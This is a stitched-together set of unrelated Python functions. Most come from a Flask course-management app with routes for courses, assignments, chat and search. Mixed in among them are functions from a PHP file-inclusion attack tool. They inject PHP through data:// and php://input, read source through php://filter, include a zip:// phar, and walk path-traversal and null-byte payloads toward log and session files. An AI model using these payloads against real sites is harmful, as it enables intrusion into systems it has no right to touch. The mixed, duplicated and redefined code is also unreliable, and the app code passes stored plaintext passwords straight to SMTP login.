def data_text(url, data='<?php phpinfo();?>', b64=False): temp = url.split("=") if b64: url = temp[0] + "=data:text/plain;base64," + data else: url = temp[0] + "=data:text/plain," + data req.req(url)
def log(url): temp = url.split("=") url = temp[0] + "=" for fi in file.log_file: bar = file.log_file.index(fi) * 100 / (len(file.log_file) - 1) sys.stdout.write(" 完成:" + str(int(bar)) + '%' + '\r') sys.stdout.flush() file_route = fi if "D:" not in fi and "C:" not in fi and "E:" not in fi: char = '' if file_route.startswith("\\") or file_route.startswith("/"): for long in range(20): if "/" in file_route: pylode = char + file_route req.req(url + pylode) char += "/.." else: pylode = char + file_route req.req(url + pylode) char += "\.." else: if "/" in file_route: for i in range(20): pylode = char + "/" + file_route req.req(url + pylode) char += "/.." else: for i in range(20): pylode = char + "\\" + file_route req.req(url + pylode) char += "\.." else: req.req(url + file_route)
def session(url, data="<?php phpinfo();?>"): temp = url.split("=") url = temp[0] + "=" for fi in file.session_file: bar = file.session_file.index(fi) * 100 / (len(file.session_file) - 1) sys.stdout.write(" 完成:" + str(int(bar)) + '%' + '\r') sys.stdout.flush() file_route = fi.replace('PHPSESSID', data) if "D:" not in fi and "C:" not in fi and "E:" not in fi: char = '' if file_route.startswith("\\") or file_route.startswith("/"): for long in range(20): if "/" in file_route: pylode = char + file_route req.req(url + pylode) char += "/.." else: pylode = char + file_route req.req(url + pylode) char += "\.." else: if "/" in file_route: for i in range(20): pylode = char + "/" + file_route req.req(url + pylode) char += "/.." else: for i in range(20): pylode = char + "\\" + file_route req.req(url + pylode) char += "\.." else: req.req(url + file_route)
def fi_zip(url, data='<?php phpinfo();?>'): temp = url.split("=") azip = zipfile.ZipFile('phar.zip', 'w') azip.writestr('phar.php', data=data, compress_type=zipfile.ZIP_DEFLATED) azip.close() path = sys.path[0] + "\phar.zip%23phar.php" url = temp[0] + '=' + "zip://" + path req.req(url)
def fi_filter(url, file='index.php', waf=False): temp = url.split('=') #如果有waf去掉read if waf: url = temp[ 0] + "=" + 'php://filter/convert.base64-encode/resource=' + file else: url = temp[ 0] + "=" + 'php://filter/read=convert.base64-encode/resource=' + file req.req(url)
def courses(): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) courses = req("get", "courses") isTeacher = False if session["role"] == "teacher": isTeacher = True if request.method == 'POST': course_id = request.get_json()['courseId'] if isTeacher: course_enroll_req = req('post', 'teachercourses', data={ 'courseId': course_id, 'teacherId': session['teacherId'] }) else: course_enroll_req = req('post', 'studentcourses', data={ 'courseId': course_id, 'studentId': session['studentId'] }) if isTeacher: enrolledCourses = req("get", "teachercourses", id=session['teacherId']) else: enrolledCourses = req("get", "studentcourses", id=session['studentId']) enrolledCourseIds = [] for course in enrolledCourses: enrolledCourseIds.append(course['courseId']) taughtCourses = [] untaughtCourses = [] for course in courses: # We only need the courses the user is not enrolled in if not course['courseId'] in enrolledCourseIds: # Determine whether course already has a teacher if course['teachers']: taughtCourses.append(course) else: untaughtCourses.append(course) return render_template('all-courses.html', taughtCourses=taughtCourses, untaughtCourses=untaughtCourses, isTeacher=isTeacher)
def moduleAssignments(courseId, moduleId): modules = [] if session.get("loginId") is None: return redirect(url_for('log_in')) request = req('GET', "courses", id=courseId) for r in request: request_docs = req("GET", "moduleAssignments", id=moduleId) modules.append(request_docs) return render_template('course.html', modules=modules)
def assignment(assignmentId): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) assignment_req = req("get", "courseassignments", id=assignmentId) date = str(assignment_req['dueDate']) assignment_req['dueDate'] = date[:2] + '/' + date[2:4] + "/" + date[4:] course_req = req("get", "courses", id=assignment_req['courseId']) is_teacher = False if session["role"] == "teacher": is_teacher = True else: # find if assignment is already complete by current student student_assignment_req = req('get', 'studentassignments') submitted = False text = '' for i in student_assignment_req: if int(i['courseAssignmentId']) == int(assignmentId) and int( i['studentId']) == int(session['studentId']): submitted = True text = i['text'] break if request.method == 'POST' and request.get_json( )['type'] == 'student_submit': # insert students submission into api data = { 'courseAssignmentId': assignmentId, 'studentId': session['studentId'], 'text': request.get_json()['text'], 'grade': -1 } text_req = req('post', 'studentassignments', data=data) print(text_req) return render_template('assignment.html', assignment=assignment_req, course_title=course_req['name'], is_teacher=is_teacher, submitted=submitted, text=text)
def announcement(announcementId): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) # query announcements request = req('GET', "announcements", id=announcementId) return render_template('announcement.html', announcement=request)
def __init__(self, imp): source = os.getenv("leet_source") if source != None: self.leet_source = source else: self.leet_source = "leet-cn" x = req.req("leet") self.session = x.get_curl(self.leet_source) self.headers = x.make_headers(self.session) self.imp = imp
def chat(chat_id): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) # when message is sent from curent user if request.method == 'POST': print(request.get_json()["message"]) message_data = { "chatId": chat_id, "timeStamp": 000, "userId": session['loginId'], "message": request.get_json()["message"] } send_message = req('post', 'messages', data=message_data) return redirect(url_for('chat', chat_id=chat_id)) # get other persons email curr_chat = req("get", "haschats", id=chat_id) print("curr chat", curr_chat) print('user1', curr_chat['userId1']) person1 = req('get', 'studentbyloginid', id=curr_chat['userId1']) if bool(person1) is False: person1 = req('get', 'teacherbyloginid', id=curr_chat['userId1']) print('user2', curr_chat['userId2']) person2 = req('get', 'studentbyloginid', id=curr_chat['userId2']) print("person2 empty", person2) if bool(person2) is False: person2 = req('get', 'teacherbyloginid', id=curr_chat['userId2']) print(person1, person2) if curr_chat['userId1'] == session['loginId']: other = person2['name'] elif curr_chat['userId2'] == session['loginId']: other = person1['name'] # get messages messages = [] message_reqs = req("get", "getmessagebychat", id=chat_id) for message in message_reqs: if message['userId'] == session['loginId']: messages.append([message['message'], 'user']) else: messages.append([message['message'], 'other']) # messages = [["message 1", "user"], ["message 2", "other"]] return render_template('chat.html', messages=messages, other=other)
def download_assignment(assignment_id: int): # get path for new file file_path = "assignments/" + str(assignment_id) + ".txt" # get assignment text from request student_assignment_req = req("get", "studentassignments", id=assignment_id) # create and write file text_file = open(file_path, "w") text_file.write(student_assignment_req['text']) # return attatchment to user return file_path
def modules(module_id): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) module_req = req('get', 'modules', id=module_id) is_teacher = False if session['role'] == 'teacher': is_teacher = True return render_template('module.html', module=module_req, is_teacher=is_teacher)
def results(): # need to get users and courses that match input in search bar users = [] courses = [] modules = [] assignments = [] # getting all courses for testing request = req("get", "courses") for i in request: courses.append([i["name"], i["description"], i["courseId"]]) return render_template('search-results.html', users=users, courses=courses, modules=modules, assignments=assignments)
def courses(): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) courses = [] request = req("get", "courses") for i in request: courses.append([i["name"], i["description"], i["courseId"]]) isTeacher = False if session["role"] == "teacher": isTeacher = True return render_template('all-courses.html', courses=courses, isTeacher=isTeacher)
def dot(url, file, sum=256): temp = url.split("=") url = temp[0] + "=" sum = sum url1 = url + file url2 = url + file + '/' url3 = url + file + '\\' for i in range(int(sum)): url1 = url1 req.req(url1) url1 = url1 + '.' url2 = url2 req.req(url2) url2 = url2 + "./" url3 = url3 req.req(url3) url3 = url3 + ".\\" url4 = url + file + '%00' req.req(url4) print(url4)
def dashboard(): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) courses = [] # get courses based on role if session["role"] == "student": # get studentId by login and set session request = req("get", "studentbyloginid", id=session["loginId"]) try: session["studentId"] = request["studentId"] except Exception as e: print(e) # get courses by studentId request = req("get", "studentcourses", id=session["studentId"]) for i in request: courses_req = req("get", "courses", id=i["courseId"]) courses.append(courses_req) print(courses) else: # get teacherId by login and set session request = req("get", "teacherbyloginid", id=session["loginId"]) try: session["teacherId"] = request["teacherId"] except Exception as e: print(e) # get courses request = req("get", "teachercourses", id=session["teacherId"]) for i in request: courses_req = req("get", "courses", id=i["courseId"]) courses.append(courses_req) numCourses = len(courses) return render_template('dashboard.html', courses=courses, numCourses=numCourses)
def course(courseId): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) # when teacher set is_teacher to true in order to pass to template grade = 0 is_teacher = False if session.get("role") == 'teacher': is_teacher = True else: total_grade = 0 number_assignments = 0 req_course_assignments = req('get', 'assignmentsbycourse', id=courseId) course_asses = [] for i in req('get', 'assignmentsbycourse', id=courseId): course_asses.append(i['courseAssignmentId']) for i in req('get', 'studentassignments'): if i['studentAssignmentId'] in course_asses and i[ 'studentId'] == session['studentId'] and i['grade'] != 0: total_grade += i['grade'] number_assignments += 1 if number_assignments != 0: grade = total_grade / number_assignments teacher_courses = req("GET", "teachercourses") student_courses = req("GET", "studentcourses") teachers = req("GET", "teachers") students = req("GET", "students") logins = req("GET", 'logins') module_recipients = [] recipients = [] announcement_recipients = [] # when post from frontend if request.method == 'POST': if request.get_json()['type'] == 'create_module': name = request.get_json()['name'] description = request.get_json()['description'] data = { 'name': name, 'description': description, 'courseId': courseId, } posted_module = req("post", "modules", data=data) data = { 'moduleId': posted_module['moduleId'], 'courseId': courseId } posted_course_module = req("post", "coursemodules", data) if teacher_courses[courseId] == student_courses[courseId]: if teacher_courses['teacherId'] == teachers['teacherId']: for student in student_courses: id = student['studentId'] if students['studentId'] == id: module_recipients.append(student['email']) msg = EmailMessage() msg['Subject'] = data['name'] if teachers['loginId'] == logins['loginId']: msg['From'] = teachers['email'] msg['To'] = module_recipients msg.set_content(data['desciption']) teacher_email = '' teacher_password = '' if teachers['loginId'] == logins['loginId']: teacher_email = logins['email'] teacher_password = logins['password'] with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp: smtp.login(teacher_email, teacher_password) smtp.send_message(msg) print("posted", posted_module) return redirect('course', courseId) if request.get_json()['type'] == 'create_assignment': name = request.get_json()['name'] description = request.get_json()['description'] due_date = request.get_json()['dueDate'].replace("/", "") print(request.get_json()) data = { 'name': name, 'description': description, 'dueDate': due_date, 'courseId': courseId, } posted_assignment = req("post", "courseassignments", data=data) teacher_email2 = '' teacher_password2 = '' if teacher_courses[courseId] == student_courses[courseId]: if teacher_courses['teacherId'] == teachers['teacherId']: for student in student_courses: id = student['studentId'] if students['studentId'] == id: recipients.append(student['email']) a_msg = EmailMessage() a_msg['Subject'] = data['name'] if teachers['loginId'] == logins['loginId']: a_msg['From'] = teachers['email'] a_msg['To'] = recipients a_msg.set_content(data['description']) if teachers['loginId'] == logins['loginId']: teacher_email2 = logins['email'] teacher_password2 = logins['password'] with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp: smtp.login(teacher_email2, teacher_password2) smtp.send_message(a_msg) print(posted_assignment) return redirect(url_for('course', courseId=courseId)) if request.get_json()['type'] == 'create_announcement': name = request.get_json()['name'] description = request.get_json()['description'] timestamp = request.get_json()['timeStamp'].replace("/", "") print(request.get_json()) data = { 'name': name, 'description': description, 'timeStamp': timestamp, 'courseId': courseId } posted_announcement = req('POST', 'announcements', data=data) t_email = '' t_password = '' if teacher_courses[courseId] == student_courses[courseId]: if teacher_courses['teacherId'] == teachers['teacherId']: for student in student_courses: id = student['studentId'] if students['studentId'] == id: announcement_recipients.append(student['email']) announcement_msg = EmailMessage() announcement_msg['Subject'] = data['name'] if teachers['loginId'] == logins['loginId']: announcement_msg['From'] = teachers['email'] announcement_msg['To'] = announcement_recipients announcement_msg.set_content(data['description']) if teachers['loginId'] == logins['loginId']: t_email = logins['email'] t_password = logins['password'] with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp: smtp.login(t_email, t_password) smtp.send_message(announcement_msg) print(posted_announcement) return redirect(url_for('course', courseId=courseId)) modules = [] assignments = [] name = "" description = "" # get course information course = req("get", "courses", id=courseId) name = course["name"] description = course["description"] # get modules req_modules = req("get", "coursemodules", id=courseId) print("req", req_modules) for i in req_modules: module = req("get", "modules", id=i["moduleId"]) modules.append([module["moduleId"], module["name"]]) # get assignments assignment_reqs = req("get", "assignmentsbycourse", id=courseId) assignments = [] for i in assignment_reqs: assignments.append([i["courseAssignmentId"], i["name"]]) #get announcements # req_announcements = req('get', 'announcements', id = courseId) # announce = [] # for i in req_announcements: # announce.append([i['announcementId'], i['name']]) print('modules', modules) # This is temporary, for design purposes: return render_template('course.html', courseId=courseId, courseName=name, courseDesc=description, courseModules=modules, courseAssignments=assignments, is_teacher=is_teacher, grade=grade)
def assignment(assignmentId): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) assignment_req = req("get", "courseassignments", id=assignmentId) date = str(assignment_req['dueDate']) assignment_req['dueDate'] = date[:2] + '/' + date[2:4] + "/" + date[4:] # download assignments for teachers def download_assignment(assignment_id: int): # get path for new file file_path = "assignments/" + str(assignment_id) + ".txt" # get assignment text from request student_assignment_req = req("get", "studentassignments", id=assignment_id) # create and write file text_file = open(file_path, "w") text_file.write(student_assignment_req['text']) # return attatchment to user return file_path course_req = req("get", "courses", id=assignment_req['courseId']) submitted = '' text = '' submissions = [] is_teacher = False if session["role"] == "teacher": is_teacher = True # get all student submissions for current courses submissions_req = req('get', 'studentassignments') submissions = [] for i in submissions_req: if i['courseAssignmentId'] == int(assignmentId): student_req = req('get', 'students', id=i['studentId']) submissions.append({ "name": student_req['name'], "grade": i['grade'], "text": i['text'], "studentAssignmentId": i['studentAssignmentId'] }) print(submissions) grade = -1 if not is_teacher: # find if assignment is already complete by current student student_assignment_req = req('get', 'studentassignments') submitted = False text = '' for i in student_assignment_req: if int(i['courseAssignmentId']) == int(assignmentId) and int( i['studentId']) == int(session['studentId']): submitted = True text = i['text'] grade = i['grade'] break if request.method == 'POST' and request.get_json( )['type'] == 'student_submit': # insert students submission into api data = { 'courseAssignmentId': assignmentId, 'studentId': session['studentId'], 'text': request.get_json()['text'], 'grade': -1 } text_req = req('post', 'studentassignments', data=data) print(text_req) if request.method == 'POST' and request.get_json( )['type'] == 'text_download': print("downloading", request.get_json()['studentAssignmentId']) file_path = download_assignment( request.get_json()['studentAssignmentId']) return send_file(file_path) if request.method == 'POST' and request.get_json( )['type'] == 'grade_submit': resp = requests.patch("http://127.0.0.1:5000/studentassignments/" + request.get_json()['studentAssignmentId'], json={"grade": request.get_json()['grade']}) print("resp", resp) return render_template('assignment.html', assignment=assignment_req, course=course_req, is_teacher=is_teacher, submitted=submitted, text=text, submissions=submissions, numberOfSubmissions=len(submissions), grade=grade)
def results(): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) # http://127.0.0.1:8000/results/?search=asdf courses = [] modules = [] assignments = [] ''' # courses request carries: course: id name description assignments: id name description modules: id name description ''' course_req = req('get', 'courses') # course object contains course data, assignment data, and module data for course in course_req: course_dic = { 'type': 'course', 'id': course['courseId'], 'name': course['name'], 'description': course['description'], } courses.append(course_dic) for assignment in course['assignments']: assignment_dic = { 'type': 'assignment', 'id': assignment['courseAssignmentId'], 'name': assignment['name'], 'description': assignment['description'], } assignments.append(assignment_dic) for module in course['modules']: module_dic = { 'type': 'module', 'id': module['moduleId'], 'name': module['name'], 'description': module['description'], } modules.append(module_dic) # get search string and convert lower case search_string = request.args.get('search').replace("%20", " ").lower() search_params = request.args.get('filter').replace("%20", " ") params_list = search_params.split() results = [] def query_courses(): for course in courses: # if search matches name or description of course name = str(course.get('name')).lower() description = str(course.get('description')).lower() print("descr", course.get('description')) if search_string in name or search_string in description: results.append(course) def query_modules(): for module in modules: # if search matches name or description of course name = str(module.get('name')).lower() description = str(module.get('description')).lower() if search_string in name or search_string in description: results.append(module) def query_assignments(): for assignment in assignments: # if search matches name or description of course name = str(assignment.get('name')).lower() description = str(assignment.get('description')).lower() if search_string in name or search_string in description: results.append(assignment) if params_list[0] == 'all': query_courses() query_modules() query_assignments() if 'modules' in params_list: query_modules() if 'assignments' in params_list: query_assignments() if 'courses' in params_list: query_courses() print("results") print(results) return render_template('search-results.html', results=results)
def fi_input(url, data='<?php phpinfo();?>'): temp = url.split("=") url = temp[0] + '=' + 'php://input' req.req(url, data)
def inbox(): print("loginId", session['loginId']) # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) chats = ["Maria", "Joe", "Frank"] search_error = None if request.method == 'POST': # creating new chat if request.get_json()["type"] == 'new-chat': logins = req("get", "logins") loginId = 0 for i in logins: if i['email'] == request.get_json()["email"]: loginId = i['loginId'] if loginId != 0: print("Found!:", loginId) data = { 'userId1': session['loginId'], 'userId2': loginId, } # check old chat to see if it exists old_chats = req('get', 'haschats') chat_found = False for chat in old_chats: if (chat['userId1'] == data['userId1'] and chat['userId2'] == data['userId2']) or ( chat['userId1'] == data['userId2'] and chat['userId2'] == data['userId1']): chat_found = True # when old chat exists if chat_found: res = jsonify({"error": "already created"}) res.status_code = 304 print("chat already created") return res else: print("created") created_chat = req('post', 'haschats', data=data) res = jsonify({"error": "no error"}) res.status_code = 200 return res else: res = jsonify({"error": 'email does not exist'}) res.status_code = 500 return res chats = [] chats_reqs = req('get', 'haschats') for i in chats_reqs: if i['userId1'] == session['loginId']: other_user = req('get', 'logins', id=i['userId2']) chats.append([other_user['email'], i['hasChatId']]) elif i['userId2'] == session['loginId']: other_user = req('get', 'logins', id=i['userId1']) chats.append([other_user['email'], i['hasChatId']]) return render_template('inbox.html', chats=chats, messages=[], senders=[], len=0, search_error=search_error)
from req import req # create student and teacher teacher_data = { 'email': '*****@*****.**', 'password': '******', } teacher_login_req = req('post', 'logins', data=teacher_data) student_data = { 'email': '*****@*****.**', 'password': '******', } student_login_req = req('post', 'logins', data=student_data) teacher_data = { 'name': 'teacher', 'email': '*****@*****.**', 'connected': 'true', 'loginId': 1, } teacher_req = req('post', 'teachers', data=teacher_data) student_data = { 'name': 'student', 'email': '*****@*****.**', 'connected': 'true', 'loginId': 2, } student_req = req('post', 'students', data=student_data) course_list = [] # create courses
def course(courseId): # when not logged in, redirect to login page if session.get("loginId") is None: return redirect(url_for('log_in')) # when teacher set is_teacher to true in order to pass to template is_teacher = False if session.get("role") == 'teacher': is_teacher = True # when post from frontend if request.method == 'POST': if request.get_json()['type'] == 'create_module': name = request.get_json()['name'] description = request.get_json()['description'] data = { 'name': name, 'description': description, 'courseId': courseId, } posted_module = req("post", "modules", data=data) data = { 'moduleId': posted_module['moduleId'], 'courseId': courseId } posted_course_module = req("post", "coursemodules", data) if teacher_courses[courseId] == student_courses[courseId]: if teacher_courses['teacherId'] == teacher['teacherId']: for student in student_courses: id = student_courses['studentId'] if student['studentId'] == id: module_recipients.append(student['email']) message = Message(data['name'], sender=teacher['email'], recipients=recipients) message.body = data['description'] mail.send(message) print("posted", posted_module) return redirect('course', courseId) if request.get_json()['type'] == 'create_assignment': name = request.get_json()['name'] description = request.get_json()['description'] due_date = request.get_json()['dueDate'].replace("/", "") print(request.get_json()) data = { 'name': name, 'description': description, 'dueDate': due_date, 'courseId': courseId, } posted_assignment = req("post", "courseassignments", data=data) if teacher_courses[courseId] == student_courses[courseId]: if teacher_courses['teacherId'] == teacher['teacherId']: for student in student_courses: id = student_courses['studentId'] if student['studentId'] == id: recipients.append(student['email']) message = Message(data['name'], sender=teacher['email'], recipients=recipients) message.body = data['description'] mail.send(message) print(posted_assignment) return redirect(url_for('course', courseId=courseId)) modules = [] assignments = [] name = "" description = "" # get course information course = req("get", "courses", id=courseId) name = course["name"] description = course["description"] # get modules req_modules = req("get", "coursemodules", id=courseId) for i in req_modules: module = req("get", "modules", id=i["moduleId"]) modules.append([module["moduleId"], module["name"]]) # get assignments assignment_reqs = req("get", "assignmentsbycourse", id=courseId) assignments = [] for i in assignment_reqs: assignments.append([i["courseAssignmentId"], i["name"]]) # This is temporary, for design purposes: return render_template('course.html', courseId=courseId, courseName=name, courseDesc=description, courseModules=modules, courseAssignments=assignments, is_teacher=is_teacher)